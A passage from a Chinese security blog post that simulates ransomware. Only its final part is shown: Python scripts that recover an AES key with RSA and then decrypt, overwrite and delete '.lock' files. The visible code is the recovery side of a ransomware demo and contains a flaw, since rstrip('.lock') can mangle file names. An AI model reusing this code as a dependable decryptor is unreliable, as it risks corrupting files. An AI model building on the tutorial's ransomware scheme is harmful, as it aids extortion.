class="keyword">as</span> aes_key_file:</span><br><span class="line">        aes_key_file.write(decrypted_aes_key)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;解密后的 AES 密钥已保存为 decrypt_aes_key.bin&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    decrypt_aes_key_with_rsa()</span><br></pre></td></tr></table></figure>

<h2 id="de-aes解密file"><a href="#de-aes解密file" class="headerlink" title="de_aes解密file"></a>de_aes解密file</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> AES</span><br><span class="line"><span class="keyword">from</span> Crypto.Util.Padding <span class="keyword">import</span> unpad</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">decrypt_file_with_aes</span>(<span class="params">file_path, aes_key</span>):</span><br><span class="line">    <span class="comment"># 读取加密文件</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(file_path, <span class="string">&#x27;rb&#x27;</span>) <span class="keyword">as</span> enc_file:</span><br><span class="line">        iv = enc_file.read(<span class="number">16</span>)  <span class="comment"># 获取文件前 16 字节作为 IV</span></span><br><span class="line">        encrypted_data = enc_file.read()  <span class="comment"># 获取剩余部分为加密数据</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 创建 AES 解密器</span></span><br><span class="line">    cipher = AES.new(aes_key, AES.MODE_CBC, iv)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 解密并去掉填充</span></span><br><span class="line">    decrypted_data = unpad(cipher.decrypt(encrypted_data), AES.block_size)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 获取原文件名并移除 .lock 后缀</span></span><br><span class="line">    decrypted_file_path = file_path.rstrip(<span class="string">&#x27;.lock&#x27;</span>)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 直接覆盖原文件</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(decrypted_file_path, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> dec_file:</span><br><span class="line">        dec_file.write(decrypted_data)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 删除原加密的 .lock 文件</span></span><br><span class="line">    os.remove(file_path)</span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 输出解密成功信息</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;文件 <span class="subst">&#123;file_path&#125;</span> 已解密为 <span class="subst">&#123;decrypted_file_path&#125;</span> 并删除原文件&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">decrypt_txt_files</span>(<span class="params">aes_key</span>):</span><br><span class="line">    <span class="comment"># 遍历当前目录下的所有 .lock 文件并解密</span></span><br><span class="line">    <span class="keyword">for</span> file_name <span class="keyword">in</span> os.listdir():</span><br><span class="line">        <span class="keyword">if</span> file_name.endswith(<span class="string">&#x27;.lock&#x27;</span>):</span><br><span class="line">            decrypt_file_with_aes(file_name, aes_key)</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="comment"># 读取解密的 AES 密钥（从 decrypt_aes_key.bin）</span></span><br><span class="line">    <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;decrypt_aes_key.bin&quot;</span>, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">        aes_key = f.read()</span><br><span class="line">    </span><br><span class="line">    decrypt_txt_files(aes_key)</span><br></pre></td></tr></table></figure></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta"><i class="fas fa-circle-user fa-fw"></i>文章作者: </span><span class="post-copyright-info"><a href="https://opvow.github.io">opvow</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta"><i class="fas fa-square-arrow-up-right fa-fw"></i>文章链接: </span><span class="post-copyright-info"><a href="https://opvow.github.io/posts/770d9e62.html">https://opvow.github.io/posts/770d9e62.html</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta"><i class="fas fa-circle-exclamation fa-fw"></i>版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来源 <a href="https://opvow.github.io" target="_blank">opvow's notebook</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E6%81%B6%E6%84%8F%E8%BD%AF%E4%BB%B6/">恶意软件</a></div><div class="post-share"><div class="social-share" data-image="/img/post_cover/default.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><a class="pagination-related" href="/posts/c9ae6404.html" title="find命令使用"><img class="cover" src="/img/post_cover/default.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="info"><div class="info-1"><div class="info-item-1">上一篇</div><div class="info-item-2">find命令使用</div></div><div class="info-2"><div class="info-item-1">参数   参数 介绍    -name 查找文件名与指定模式匹配的文件(区分大小写)   -iname 查找文件名与指定模式匹配的文件(不区分大小写)   -type 指定查找的文件类型。例如，f 代表文件，d 代表目录   -size 根据文件大小查找文件。可以使用 k (KB)、M (MB)、G (GB) 等后缀   -mtime 根据文件的修改时间查找文件。+n 表示修改时间在 n 天前，-n 表示 n 天内，n 表示刚好 n 天前   -user 根据文件所有者查找文件   -exec 对找到的每个文件执行指定的命令。用 {} 表示找到的文件，+ 结尾表示批量处理   -print 显示找到的文件(默认)   举例path&#x2F;to&#x2F;search路径下查找类型为文件不区分大小写查找以txt为结尾的文件文件大小超过1mb文件所有者为username每个查询到的文件执行cp {} &#x2F;path&#x2F;to&#x2F;destination&#x2F; ;...</div></div></div></a><a class="pagination-related" href="/posts/962f5710.html" title="Portswigger-JWT-LAB-1"><img class="cover" src="/img/post_cover/background.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="info text-right"><div class="info-1"><div class="info-item-1">下一篇</div><div class="info-item-2">Portswigger-JWT-LAB-1</div></div><div class="info-2"><div class="info-item-1">未经验证的签名绕过JWT身份验证未经验证的签名，即修改载荷发送至服务端不会对算法和签名进行验证从而绕过JWT身份认证 题目信息用户凭证: wiener:peter 题目要求 修改会话令牌以访问&#x2F;admin处的管理面板，并删除用户carlos 解题靶场页面登录页面登录抓包返回jwt令牌数据查看jwt详细数据抓包，访问My account功能点修改接口admin:GET &#x2F;my-account?id&#x3D;wiener为admin:GET &#x2F;admin，出现错误，显示:管理员界面仅在以管理员身份登录时可用修改sub值为admin或administrator成功删除carlos(点击删除还会对jwt令牌认证，再次抓包修改jwt的sub值为administrator即可) </div></div></div></a></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><a class="pagination-related" href="/posts/4fea4d13.html" title="vulntarget-N勒索病毒靶场练习"><img class="cover" src="/img/post_cover/default.png" alt="cover"><div class="info text-center"><div class="info-1"><div class="info-item-1"><i class="far fa-calendar-alt fa-fw"></i> 2024-11-04</div><div class="info-item-2">vulntarget-N勒索病毒靶场练习</div></div><div class="info-2"><div class="info-item-1">项目背景https://blog.csdn.net/csdnmmd/article/details/139614037 vulntarget-n是一个模拟全球化勒索病毒高发环境下的应急响应和取证分析案例，其模拟了一个正常运行的业务服务被勒索病毒攻击的情景：    01、客户在阿里云部署的业务环境    02、今天突然发现首页变成了一个勒索的界面，要求用户支付赎金以解密数据    03、客户发现其中部分重要文件被加密为.vulntarget结尾随即客户要你进行应急响应并取证分析，因为是阿里云的ECS，客户将阿里云ECS实例镜像导出到本地，要求你在明天分析出结果。具体要求如下：    01、分析攻击事件是如何发生的，请给出攻击画像    02、解密勒索    03、恢复原来的index.jsp页面，恢复正常的web服务 服务器配置阿里云ECS服务器-ubuntu vmdk镜像账号 root密码...</div></div></div></a></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info text-center"><div class="avatar-img"><img src="/img/avatar.png" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info-name">opvow</div><div class="author-info-description">opvow's notebook</div><div class="site-data"><a href="/archives/"><div class="headline">文章</div><div class="length-num">39</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">31</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">12</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://github.com/opvow"><i class="fab fa-github"></i><span>Follow Me</span></a><div class="card-info-social-icons"><a class="social-icon" href="https://github.com/opvow" target="_blank" title="Github"><i class="fab fa-github" style="color: #24292e;"></i></a></div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content is-expand"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%B5%81%E7%A8%8B"><span class="toc-number">1.</span> <span class="toc-text">流程</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E5%8B%92%E7%B4%A2%E7%97%85%E6%AF%92"><span class="toc-number">2.</span> <span class="toc-text">常见勒索病毒</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5"><span class="toc-number">3.</span> <span class="toc-text">攻击手段</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E5%8A%A0%E5%AF%86"><span class="toc-number">4.</span> <span class="toc-text">常见加密</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#AES%E5%AF%B9%E7%A7%B0%E5%8A%A0%E5%AF%86"><span class="toc-number">4.1.</span> <span class="toc-text">AES对称加密</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#RSA%E9%9D%9E%E5%AF%B9%E7%A7%B0%E5%8A%A0%E5%AF%86"><span class="toc-number">4.2.</span> <span class="toc-text">RSA非对称加密</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E6%B5%8B%E8%AF%95"><span class="toc-number">5.</span> <span class="toc-text">攻击测试</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%94%9F%E6%88%90AES%E5%AF%86%E9%92%A5"><span class="toc-number">5.1.</span> <span class="toc-text">生成AES密钥</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#aes%E5%8A%A0%E5%AF%86%E6%96%87%E4%BB%B6"><span class="toc-number">5.2.</span> <span class="toc-text">aes加密文件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rsa%E5%85%AC%E7%A7%81%E9%92%A5%E7%94%9F%E6%88%90"><span class="toc-number">5.3.</span> <span class="toc-text">rsa公私钥生成</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rsa%E5%85%AC%E9%92%A5%E5%8A%A0%E5%AF%86aes"><span class="toc-number">5.4.</span> <span class="toc-text">rsa公钥加密aes</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#rsa%E5%85%AC%E9%92%A5%E8%A7%A3%E5%AF%86aes"><span class="toc-number">5.5.</span> <span class="toc-text">rsa公钥解密aes</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#de-aes%E8%A7%A3%E5%AF%86file"><span class="toc-number">5.6.</span> <span class="toc-text">de_aes解密file</span></a></li></ol></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/posts/e5da2ca1.html" title="sqlmap"><img src="/img/post_cover/background.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="sqlmap"/></a><div class="content"><a class="title" href="/posts/e5da2ca1.html" title="sqlmap">sqlmap</a><time datetime="2024-12-03T07:36:53.000Z" title="发表于 2024-12-03 15:36:53">2024-12-03</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/fe1704c8.html" title="内网穿透工具FRP"><img src="/img/post_cover/background.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="内网穿透工具FRP"/></a><div class="content"><a class="title" href="/posts/fe1704c8.html" title="内网穿透工具FRP">内网穿透工具FRP</a><time datetime="2024-11-29T06:06:13.000Z" title="发表于 2024-11-29 14:06:13">2024-11-29</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/posts/1dabe8f3.html" title="内网基础知识记录"><img src="/img/post_cover/background.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="内网基础知识记录"/></a><div class="content"><a class="title" href="/posts/1dabe8f3.html" title="内网基础知识记录">内网基础知识记录</a><time datetime="2024-11-27T06:19:43.000Z" title="发表于 2024-11-27 14:19:43">2024-11-27</time></div></div></div></div></div></div></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2019 - 2024 By opvow</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div><div class="footer_custom_text">Hi, welcome to my <a href="https://opvow.github.io">blog</a>!</div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="translateLink" type="button" title="简繁转换">繁</button><button id="darkmode" type="button" title="日间和夜间模式切换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="/js/tw_cn.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox/fancybox.umd.min.js"></script><script src="https://cdn.jsdelivr.net/npm/instant.page/instantpage.min.js" type="module"></script><script src="https://cdn.jsdelivr.net/npm/node-snackbar/dist/snackbar.min.js"></script><script>(() => {
  const panguFn = () => {
    if (typeof pangu === 'object') pangu.autoSpacingPage()
    else {
      btf.getScript('https://cdn.jsdelivr.net/npm/pangu/dist/browser/pangu.min.js')
        .then(() => {
          pangu.autoSpacingPage()
        })
    }
  }

  const panguInit = () => {
    if (false){
      GLOBAL_CONFIG_SITE.isPost && panguFn()
    } else {
      panguFn()
    }
  }

  btf.addGlobalFn('pjaxComplete', panguInit, 'pangu')
  document.addEventListener('DOMContentLoaded', panguInit)
})()</script><div class="js-pjax"></div><script async src="/js/title_change.js"></script><canvas class="fireworks" mobile="false"></canvas><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/fireworks.min.js"></script><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/activate-power-mode.min.js"></script><script>POWERMODE.colorful = true;
POWERMODE.shake = false;
POWERMODE.mobile = false;
document.body.addEventListener('input', POWERMODE);
</script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><div id="algolia-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="search-wrap"><div id="algolia-search-input"></div><hr/><div id="algolia-search-results"><div id="algolia-hits"></div><div id="algolia-pagination"></div><div id="algolia-info"><div class="algolia-stats"></div><div class="algolia-poweredBy"></div></div></div></div></div><div id="search-mask"></div><script src="https://cdn.jsdelivr.net/npm/algoliasearch/dist/lite/builds/browser.umd.min.js"></script><script src="https://cdn.jsdelivr.net/npm/instantsearch.js/dist/instantsearch.production.min.js"></script><script src="/js/search/algolia.js"></script></div></div></body></html>